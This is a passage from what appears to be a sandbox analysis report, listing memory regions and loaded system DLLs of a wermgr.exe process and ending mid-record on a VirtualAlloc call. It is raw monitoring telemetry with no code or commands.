"" Region: id = 355 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 356 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 357 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 358 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 359 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 360 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 361 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 362 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 363 start_va = 0x7ff6efcf0000 end_va = 0x7ff6efd18fff monitored = 0 entry_point = 0x7ff6efcf8360 region_type = mapped_file name = "wermgr.exe" filename = "\\Windows\\System32\\wermgr.exe" (normalized: "c:\\windows\\system32\\wermgr.exe") Region: id = 364 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 382 start_va = 0x100000 end_va = 0x128fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 383 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 384 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 385 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 386 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 387 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 388 start_va = 0x130000 end_va = 0x1edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 389 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 390 start_va = 0x600000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 391 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 392 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 393 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 394 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 395 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 396 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 397 start_va = 0x7ffb106f0000 end_va = 0x7ffb1078ffff monitored = 0 entry_point = 0x7ffb10760910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 398 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 399 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 400 start_va = 0x800000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 401 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 402 start_va = 0x930000 end_va = 0xa72fff monitored = 0 entry_point = 0x958210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 403 start_va = 0x930000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 404 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 405 start_va = 0x800000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 406 start_va = 0x920000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 407 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 408 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 409 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 410 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 411 start_va = 0x690000 end_va = 0x6c8fff monitored = 0 entry_point = 0x6912f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 412 start_va = 0x930000 end_va = 0xab7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 413 start_va = 0xaf0000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 414 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 415 start_va = 0xb00000 end_va = 0xc80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 416 start_va = 0xc90000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 417 start_va = 0x690000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 418 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 419 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 420 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 421 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 422 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 423 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 424 start_va = 0x7ffb24c90000 end_va = 0x7ffb24cb6fff monitored = 0 entry_point = 0x7ffb24ca0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 425 start_va = 0x7ffb24c50000 end_va = 0x7ffb24c89fff monitored = 0 entry_point = 0x7ffb24c58d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 426 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 427 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 428 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 429 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 430 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 431 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 432 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 433 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 434 start_va = 0x2090000 end_va = 0x32e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 435 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 436 start_va = 0x7ffb1dd40000 end_va = 0x7ffb1dd55fff monitored = 0 entry_point = 0x7ffb1dd419f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 437 start_va = 0x7ffb1dd20000 end_va = 0x7ffb1dd39fff monitored = 0 entry_point = 0x7ffb1dd22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 438 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 439 start_va = 0x7ffb24aa0000 end_va = 0x7ffb24ab6fff monitored = 0 entry_point = 0x7ffb24aa79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 440 start_va = 0x7ffb24730000 end_va = 0x7ffb24763fff monitored = 0 entry_point = 0x7ffb2474ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 441 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 442 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 443 start_va = 0x32ea0000 end_va = 0x331d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 444 start_va = 0x331e0000 end_va = 0x332bcfff monitored = 0 entry_point = 0x3323e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 445 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 446 start_va = 0x331e0000 end_va = 0x333affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000331e0000" filename = "" Region: id = 447 start_va = 0x6c0000 end_va = 0x6c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 448 start_va = 0x333b0000 end_va = 0x336affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000333b0000" filename = "" Region: id = 449 start_va = 0x7ffb1a9b0000 end_va = 0x7ffb1aa2ffff monitored = 0 entry_point = 0x7ffb1a9dd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 450 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 451 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 452 start_va = 0x880000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 453 start_va = 0x6d0000 end_va = 0x6d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 454 start_va = 0x6e0000 end_va = 0x6e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 455 start_va = 0x6f0000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 456 start_va = 0x900000 end_va = 0x90ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 457 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 458 start_va = 0x910000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 459 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 460 start_va = 0x333b0000 end_va = 0x337aafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000333b0000" filename = "" Region: id = 461 start_va = 0x2090000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 462 start_va = 0x2150000 end_va = 0x32e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 463 start_va = 0x7ffb24670000 end_va = 0x7ffb246e9fff monitored = 0 entry_point = 0x7ffb24691a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 464 start_va = 0x7ffb1a590000 end_va = 0x7ffb1a5a3fff monitored = 0 entry_point = 0x7ffb1a593710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 465 start_va = 0x7ffb1a640000 end_va = 0x7ffb1a65dfff monitored = 0 entry_point = 0x7ffb1a64ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 466 start_va = 0x331e0000 end_va = 0x3325ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000331e0000" filename = "" Region: id = 467 start_va = 0x333a0000 end_va = 0x333affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000333a0000" filename = "" Region: id = 468 start_va = 0x33260000 end_va = 0x3335ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033260000" filename = "" Region: id = 469 start_va = 0x337b0000 end_va = 0x339affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000337b0000" filename = "" Region: id = 470 start_va = 0x7ffb24120000 end_va = 0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 471 start_va = 0x7ffb1a530000 end_va = 0x7ffb1a55efff monitored = 0 entry_point = 0x7ffb1a53ec60 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 472 start_va = 0x339b0000 end_va = 0x33a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000339b0000" filename = "" Region: id = 473 start_va = 0x7ffb1dac0000 end_va = 0x7ffb1db26fff monitored = 0 entry_point = 0x7ffb1dac63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 474 start_va = 0x7ffb1c710000 end_va = 0x7ffb1c719fff monitored = 0 entry_point = 0x7ffb1c7114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 475 start_va = 0x33a30000 end_va = 0x33aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033a30000" filename = "" Region: id = 476 start_va = 0x7ffb21b20000 end_va = 0x7ffb21b48fff monitored = 0 entry_point = 0x7ffb21b2ca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 477 start_va = 0x7ffb24770000 end_va = 0x7ffb24779fff monitored = 0 entry_point = 0x7ffb24771830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 478 start_va = 0x33ab0000 end_va = 0x33db0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033ab0000" filename = "" Region: id = 479 start_va = 0x910000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 480 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 481 start_va = 0xac0000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 482 start_va = 0x7ffb20f80000 end_va = 0x7ffb2103efff monitored = 0 entry_point = 0x7ffb20fa1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 483 start_va = 0xad0000 end_va = 0xad1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 849 start_va = 0x7ffb11470000 end_va = 0x7ffb11485fff monitored = 0 entry_point = 0x7ffb11471af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 850 start_va = 0x7ffb11490000 end_va = 0x7ffb114a9fff monitored = 0 entry_point = 0x7ffb11492330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 851 start_va = 0x7ffb21440000 end_va = 0x7ffb21457fff monitored = 0 entry_point = 0x7ffb21445910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 852 start_va = 0x7ffb114b0000 end_va = 0x7ffb114bcfff monitored = 0 entry_point = 0x7ffb114b1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1215 start_va = 0x33ab0000 end_va = 0x33b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033ab0000" filename = "" Region: id = 1216 start_va = 0x33b30000 end_va = 0x33baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033b30000" filename = "" Region: id = 1217 start_va = 0x33bb0000 end_va = 0x33c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033bb0000" filename = "" Region: id = 1218 start_va = 0x33c30000 end_va = 0x33caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033c30000" filename = "" Region: id = 1219 start_va = 0x33cb0000 end_va = 0x33d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033cb0000" filename = "" Region: id = 1220 start_va = 0x33d30000 end_va = 0x33daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033d30000" filename = "" Region: id = 1221 start_va = 0x33db0000 end_va = 0x33e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033db0000" filename = "" Region: id = 1222 start_va = 0x33e30000 end_va = 0x33eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033e30000" filename = "" Region: id = 1223 start_va = 0x33eb0000 end_va = 0x33f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033eb0000" filename = "" Region: id = 1224 start_va = 0x33f30000 end_va = 0x33faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033f30000" filename = "" Region: id = 1225 start_va = 0x33fb0000 end_va = 0x3402ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033fb0000" filename = "" Region: id = 1226 start_va = 0x34030000 end_va = 0x340affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034030000" filename = "" Region: id = 1227 start_va = 0x340b0000 end_va = 0x3412ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000340b0000" filename = "" Region: id = 1228 start_va = 0x34130000 end_va = 0x341affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034130000" filename = "" Region: id = 1229 start_va = 0x341b0000 end_va = 0x3422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000341b0000" filename = "" Region: id = 1230 start_va = 0x34230000 end_va = 0x342affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034230000" filename = "" Region: id = 1231 start_va = 0x342b0000 end_va = 0x3432ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000342b0000" filename = "" Region: id = 1232 start_va = 0x34330000 end_va = 0x343affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034330000" filename = "" Region: id = 1233 start_va = 0x343b0000 end_va = 0x3442ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000343b0000" filename = "" Region: id = 1234 start_va = 0x34430000 end_va = 0x344affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034430000" filename = "" Region: id = 1235 start_va = 0x344b0000 end_va = 0x3452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000344b0000" filename = "" Region: id = 1236 start_va = 0x34530000 end_va = 0x345affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034530000" filename = "" Region: id = 1237 start_va = 0x345b0000 end_va = 0x3462ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000345b0000" filename = "" Region: id = 1238 start_va = 0x34630000 end_va = 0x3472ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034630000" filename = "" Region: id = 1240 start_va = 0x34730000 end_va = 0x347affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034730000" filename = "" Region: id = 1241 start_va = 0x347b0000 end_va = 0x3482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000347b0000" filename = "" Region: id = 1797 start_va = 0x33ab0000 end_va = 0x33daefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033ab0000" filename = "" Region: id = 1798 start_va = 0x34830000 end_va = 0x348affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034830000" filename = "" Region: id = 1818 start_va = 0x34230000 end_va = 0x34533fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034230000" filename = "" Thread: id = 3 os_tid = 0x770 [0088.106] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 